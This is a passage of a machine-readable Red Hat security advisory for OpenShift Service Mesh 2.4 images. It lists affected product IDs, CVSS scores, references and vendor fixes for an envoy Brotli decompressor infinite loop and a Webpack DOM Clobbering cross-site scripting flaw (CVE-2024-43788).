"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: Brotli decompressor infinite loop", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], 